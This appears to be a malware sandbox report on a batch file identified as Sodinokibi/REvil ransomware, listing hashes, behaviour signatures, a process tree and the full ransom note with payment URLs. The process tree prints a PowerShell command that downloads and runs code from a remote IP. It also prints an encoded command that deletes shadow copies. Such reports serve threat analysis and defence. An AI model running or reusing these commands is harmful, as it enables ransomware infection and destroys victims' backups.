Overview

overview

10

Static

static

b692cd395a...a0.bat

windows7_x64

10

b692cd395a...a0.bat

windows10_x64

10

Analysis

  • max time kernel
    135s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    15-05-2020 19:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b692cd395a2db4aacd53de584ee06ea0.bat

  • Size

    215B

  • MD5

    7b613efb2eb2240a79c12ff83b16d370

  • SHA1

    c74e994acea6c088e0590c14a99ccada44dd7c12

  • SHA256

    ace21c38bbf5a81a0646d2f3d272bf7b43c84e248c3524bdcbb855c8594a0d6e

  • SHA512

    7242a8a1d96558ffbc16b91b9a1dbd25a60396da43c9d46b0a57eecceee262bdde40cd44c507a122ee9567882de40c1c75514048b241e62181c0e5a67ea72024

Score
10/10
ransomwarepersistenceevasionspywaretrojansodinokibi

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/b692cd395a2db4aacd53de584ee06ea0

Extracted

Path

C:\58f8ai-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 58f8ai. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B5BF4A84C842F97B 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/B5BF4A84C842F97B Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 5E2zw0HBYq0OEllVsX/KMTWq5oymQDODnJrP6HxxNOPgg6/OtPkp5aAGG5hdeSHM t0wzzPigLzFmugKElzDBmCvzpBy12rrxKaeM7CUq80NF1P4MmyVqyBHWrgickoH9 odH2YzKR5qPTdrzGuf+WUX8xVW97rTJE7dLzZvX/vfrUurXj4p0YAdFNcuAqdTee VMnEE5dVd75WCIAswYY4IvfGzVuIYnU2ixgPWphE5wObYb+HoHo+HWBbSys9DyWF pWBE05t3hsPxtf0GVBhcxnHLdSfdOL+Fx+M1TndejSNEK0RMQIOWq87fZlWHiK/0 HzEIuXiPmrpDTRll7qeqJGzTtT3UoVCpfb6j0w6Ep3If5n58DQn8G3kBomyIKJp4 5sw66pJiVAFD+TSkunl3OtpFf55A2/uhgsxZUuolL9aePYUE1EOcg4h6IMbSPzeG 76QI3BSVQ9OnZqqs6rjiYLDlxjmtJzrNNJvuXYrmOjWqunrWvNmCDWeba4ufm1gz lj61ZjFXNKsDHslwvrKC5XT6IsnAoEExdgaeUoLEFcPSlaZTGoT3zARbrPQQ3QY8 I1J4wwkZAWKQ+R3mLDKTcpdlYvB8/uk80Clmzp6//k67VmHFEZfC4rNH5OcuKlp2 5FvaonJoge1SSv2HsUhWf3T907nBlvR30AJZJXlk+zuHb3BmgcWviW7osNVbTo9W tHAsix4T00LBPQRirTyMRjl3lOY4rZy8jYExzMjGzZBtY9f6n7x751G00IocE+cD DFg5V/s9ZrYP0/v+6Rb0wNBewmZQIq+BD9L1GqtCJG7iEWea6gu6W0nSoTFwfZPe qBvzdqZJ8S2/mRLyaeffS2Y4nX1KHv36kqEbaUcNMviIlRDG+I014KScOgaWUuhX xpseY7kk4wbhJClKu1YrASqcdCUsjzYfCTACxr/Zb1ECruB05efJFLs8Sw9a59rc VsjFMMl55MTU1Dr4MWgVSWAERh3fjsX4vtJoMglcuwBI6+ZpaVv8HudAF3p52Xce LehInLWT0HbdpLVESHys30rwl8NfO0LSTovJLNCejCzH1lfoGjr1aNdnygOj0Cia OTgg5SwYGbskE3lHeJLn42Td3NV0mbt2I44RHrkKMF4EfNe53qfpGYb7KITKzX/u ketpjUF8K/W9IBbq1nsttr9M02Ykgkwt/CaqdMTkSApIoopDnaRkzF8Hs17SVuE1 y3jtmtrIzSvXjBn6wfVjUoh7TZ21NCJg6px6CQ56EoseORF+vgWoFc61QYQcAzmX hpLFlvOmUNhTAVpyUfkhIOQfwI1eYoXY7mOd6+x/XRI= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B5BF4A84C842F97B

http://decryptor.cc/B5BF4A84C842F97B

Signatures

  • Drops file in Program Files directory 28 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Modifies system certificate store 2 TTPs 4 IoCs
    evasionspywaretrojan
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Enumerates connected drives 3 TTPs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 83 IoCs
  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\b692cd395a2db4aacd53de584ee06ea0.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:676
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/b692cd395a2db4aacd53de584ee06ea0');Invoke-IKBCFDVD;Start-Sleep -s 10000"
      2⤵
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Modifies system certificate store
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Drops file in System32 directory
      • Suspicious use of WriteProcessMemory
      PID:784
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1884
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1556

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit